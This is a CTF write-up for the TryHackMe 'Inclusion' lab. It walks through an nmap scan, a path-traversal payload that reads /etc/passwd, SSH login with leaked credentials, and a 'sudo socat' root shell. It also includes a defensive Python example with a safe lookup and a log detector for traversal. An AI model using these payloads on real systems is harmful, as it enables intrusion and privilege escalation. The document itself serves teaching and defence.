LFI Inclusion - TryHackMe

This is a write-up for the LFI Inclusion room from TryHackMe, a beginner-level LFI challenge:

https://tryhackme.com/room/inclusion

Our task is simple: deploy the machine, find the LFI parameter, and get the user and root flags. First, check which services are running on the machine:

nmap -sC -sV 10.10.41.78

(screenshot: nmap scan output)

So we have SSH and a web server running. Let's check the website first.

After some basic browsing of the website we found the following links:

  • http://10.10.41.78/article?name=hacking
  • http://10.10.41.78/article?name=lfiattack
  • http://10.10.41.78/article?name=rfiattack

The “name” parameter is passed straight to the page, which makes it a candidate for LFI.

Let's try the following and see if we get anything:

http://10.10.41.78/article?name=../../../../../etc/passwd

(screenshot: contents of /etc/passwd returned by the page)

Sure enough, the output reveals credentials for a user named falconfeast. Let's log in to the box over SSH with these credentials:

ssh falconfeast@10.10.41.78

The user flag is in falconfeast's home directory.
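Before moving on to privilege escalation, it is worth seeing what the fix for this bug looks like. The block below is an added example, not the room's source code: it shows the vulnerable pattern (query value joined onto a directory), a hardened lookup that allowlists the three article names seen above and then confirms the canonical path stays inside the article directory, and a small detector that flags traversal attempts like the one above in web-server access logs. ARTICLE_DIR and the log lines are constructed for the example.

```python
import os
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed location of the article files (constructed for this example).
ARTICLE_DIR = os.path.realpath("/var/www/articles")
# The only names the application actually serves (taken from the room's links).
ALLOWED_ARTICLES = {"hacking", "lfiattack", "rfiattack"}

def vulnerable_article_path(name: str) -> str:
    """The bug: the query value is glued onto a directory with no validation,
    so name=../../../../../etc/passwd walks straight out of ARTICLE_DIR."""
    return os.path.join(ARTICLE_DIR, name)

def safe_article_path(name: str):
    """Return the file to serve, or None if the request must be refused."""
    if name not in ALLOWED_ARTICLES:          # first line of defence: allowlist
        return None
    candidate = os.path.realpath(os.path.join(ARTICLE_DIR, name))
    # Second line of defence: canonicalise and confirm the result still
    # lives under ARTICLE_DIR, in case the allowlist is ever loosened.
    if os.path.commonpath([ARTICLE_DIR, candidate]) != ARTICLE_DIR:
        return None
    return candidate

# Matches a "../" or "..\" segment, or an absolute path, in the decoded value.
TRAVERSAL = re.compile(r"\.\.[/\\]|^[/\\]")

def flag_traversal_requests(log_lines):
    """Return the request targets whose 'name' value looks like traversal.
    The value is URL-decoded first so %2F-encoded slashes are caught too."""
    hits = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP', line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group(1)).query)
        for value in query.get("name", []):
            if TRAVERSAL.search(unquote(value)):
                hits.append(m.group(1))
    return hits

# Constructed access-log lines (combined log format); not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [29/Jul/2020:10:00:01 +0000] "GET /article?name=hacking HTTP/1.1" 200 1532',
    '10.0.0.9 - - [29/Jul/2020:10:00:07 +0000] "GET /article?name=../../../../../etc/passwd HTTP/1.1" 200 2110',
    '10.0.0.9 - - [29/Jul/2020:10:00:09 +0000] "GET /article?name=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2110',
]
```

A 200 response on a flagged request, as in the last two sample lines, is the signal that the include actually succeeded and the host needs to be treated as exposed.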

Now let's see whether we can run anything with sudo:

sudo -l

(screenshot: sudo -l output)

Yes, we can run socat as root without a password. Great, let's do some privilege escalation. Go to https://gtfobins.github.io/ and search for “socat”. We found:

Let's try what we found and see if it gives us a root shell:

sudo socat stdin exec:/bin/sh

(screenshot: root shell via socat)

That gives us the root flag as well. Submit both flags :)

Originally published at https://basicpentesting.blogspot.com on July 29, 2020.

Author: 0xsanz. Software Developer with a keen interest in Security, Privacy and Pen-testing. Certs: Security+, PenTest+, AZ900.